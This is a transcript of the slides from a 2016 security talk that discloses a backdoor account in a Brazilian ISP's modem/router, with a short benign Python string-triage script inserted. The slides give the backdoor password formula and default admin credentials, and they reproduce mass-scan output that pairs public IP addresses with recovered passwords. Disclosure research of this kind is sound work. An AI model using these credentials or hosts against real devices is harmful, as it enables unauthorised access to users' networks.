[cb16] who put the backdoor in my modem? by ewerson guimaraes
CONFIDENTIAL
Who put the backdoor in my router?
Ewerson Guimarães (Crash) / 2016
Research Information
This talk was born in Área31 hackerspace.
All information contained here is public.
No one was hacked (cof cof)
About Ewerson (Crash):
Background...
Let’s start...
We won't talk about the backdoor itself, so…
Here is the backdoor...
The usernames are identical, but one of the two accounts is a backdoor account
Turning a single user into a backdoor...
Let's analyze the hardware
The Strange Device
Strange ID TAG!
The Strange Device
The device is approved by ANATEL (the Brazilian National Telecommunications Agency)
More strange stuff...
BayTech:
More strange stuff...
If you search for S&T Technology Shen Zhen Co. Ltd:
More strange stuff...
In the device manager you can see Observa Telecom, but...
The vendor's website exists, but it is a single branded blank page with no links to other areas such as manuals, support or firmware.
More strange stuff...
Of course, he didn't reply to the 11 emails...
More strange stuff...
This device is distributed by GVT (Global Village Telecom). According to GVT technical support and the GVT website, this modem/router is not supported by them.
Don't believe it? Take a look at: http://www.gvt.com.br/PortalGVT/Atendimento/Area-Aberta/Documentos/Lista-de-Modens
More strange stuff...
Opening its firmware in a hex viewer... Wow, wait, it's made by TP-LINK??????
More strange stuff...
The backdoor password: the last two octets of the MAC address + the string airocon
More strange stuff...
What is Airocon?
More strange stuff...
The last available site (Mar. 2005)
More strange stuff...
Do you remember the tag ID and the Anatel seal?
Bingo! 41C3
...and to finish this strange part...
Hardware vendor: Realtek
Inside the backdoor...
Login with the normal admin user (admin:gvt12345)
The commands "sh" and "login show" are disabled.
Inside the backdoor... When logged in with the backdoor account:
Inside the backdoor...
The "login show" command shows the backdoor account (which is hidden in the web interface)
Inside the backdoor...
Taking a closer look at the device's memory, it was possible to find some interesting information:
A redirection link to a Chinese company:
Even after a reset, it was possible to retrieve the device's previous user name:
The device saves neighbouring network names:
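The two slides above (the hex-viewer look at the firmware that revealed the TP-LINK string, and the memory dump that still held a redirect URL, the previous owner's user name and neighbouring SSIDs) both come down to the same analyst step: pull printable strings out of a binary blob and sort them into things worth a second look. The script below is an added example of that triage step, not the speaker's tooling and not anything shipped with the device. The blob it scans is constructed inline (the URL, key names and "PLACEHOLDER_SECRET" value are stand-ins); the vendor markers are the names the talk mentions, and the credential/SSID key patterns are generic assumptions, not strings known to exist in this firmware.

```python
import re

# Constructed sample "firmware" bytes: printable strings separated by
# filler. The URL, key names and secret value are placeholders.
SAMPLE_BLOB = (
    b"\x00\x01\x02\xffTP-LINK\x00\x00\x00"
    b"\x7fELF"                                  # 3 printable bytes, too short
    b"\x00http://redirect.example.invalid/portal\x00\x10\x10"
    b"wlan_neighbor_ssid=CoffeeShop-5G\x00"
    b"\x00\x00admin_user=old_owner\x00\xfe\xfe"
    b"\x00radius_secret=PLACEHOLDER_SECRET\x00"
    b"ab\x00"                                   # below MIN_LEN, ignored
)

MIN_LEN = 6

# Vendor names taken from the talk (TP-LINK, Realtek, Observa, Airocon).
VENDOR_MARKERS = ("tp-link", "tplink", "realtek", "observa", "airocon")
# Generic "key=value" patterns an analyst would flag; assumptions, not
# names confirmed to exist on this device.
CREDENTIAL_KEYS = ("user", "pass", "secret", "key", "pwd")
NETWORK_KEYS = ("ssid",)
URL_PREFIXES = ("http://", "https://", "ftp://")


def extract_strings(blob: bytes, min_len: int = MIN_LEN) -> list[str]:
    """Return every run of printable ASCII at least min_len bytes long
    (the same idea as the `strings` utility)."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pat.finditer(blob)]


def classify(s: str) -> str:
    """Bucket one extracted string: url, vendor, network, credential-like or other."""
    low = s.lower()
    if low.startswith(URL_PREFIXES):
        return "url"
    if any(v in low for v in VENDOR_MARKERS):
        return "vendor"
    if "=" in low:
        key = low.split("=", 1)[0]
        if any(k in key for k in NETWORK_KEYS):
            return "network"
        if any(k in key for k in CREDENTIAL_KEYS):
            return "credential-like"
    return "other"


def triage(blob: bytes) -> dict[str, list[str]]:
    """Extract and bucket all strings in blob, preserving file order."""
    buckets: dict[str, list[str]] = {
        "url": [], "vendor": [], "network": [], "credential-like": [], "other": []
    }
    for s in extract_strings(blob):
        buckets[classify(s)].append(s)
    return buckets


if __name__ == "__main__":
    for kind, items in triage(SAMPLE_BLOB).items():
        for s in items:
            print(f"{kind:16} {s}")
```

On a real dump you would feed `triage()` the file contents instead of `SAMPLE_BLOB`; the "credential-like" and "url" buckets are the ones to review first, since the talk's findings (leftover user name, GVT credential-service data, a redirect to an unrelated company) all landed in exactly those categories, and anything that survives a factory reset is evidence the reset does not wipe the region it lives in.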
Inside the backdoor...
Sensitive data about GVT credential services:
Inside the backdoor...
Furthermore, the admin page shown to the backdoor user is completely different from the common admin page.
Inside the backdoor...
The factory default password is not admin:admin, admin:12345, admin:
You can do a factory reset! The password stays: admin:gvt12345
Outside the backdoor...
Shodan is your friend, or not...
Devices exposed on the internet: almost 5600
Small shell script:
root@anubis:~# ./gvtfucker.sh
GVT RTN04 F*cker
Testing:177.206.29.204
Backdoor password: airocon2533
Testing:179.179.72.251
Testing:189.113.134.199
Backdoor password: airocon0E6B
Testing:186.213.233.192
Testing:186.215.19.197
Testing:189.113.136.93
Backdoor password: airoconCE4A
Testing:189.113.138.111
Testing:189.113.137.203
Testing:189.26.50.164
Testing:189.58.16.44
Testing:191.248.83.225
Testing:177.132.241.119
Backdoor password: airocon02CC
Testing:177.156.255.85
Testing:177.156.36.116
Backdoor password: airoconFA1E
Testing:177.157.166.210
Testing:187.59.45.9
Testing:189.113.131.161
Testing:189.113.131.197
Testing:189.113.134.226
Testing:189.113.137.32
Testing:189.113.138.111
Backdoor password: airoconDA32
Inside again
Updates...
Around one year later, the Observa site was updated.
Updates...
I tried another contact...
How to fix
Change the backdoor flag, upload the file and never reset to factory defaults.
OR / AND
Of course, disable remote access.
Hack the firmware.
Considerations
AUDIT YOUR DEVICES!
BURN YOUR DEVICES!
FUZZ and F*CK YOUR DEVICES!
And the golden question:
Who put the backdoor in my router?
Questions?
Please say your full name before asking*.
* I have a Death Note.
THANKS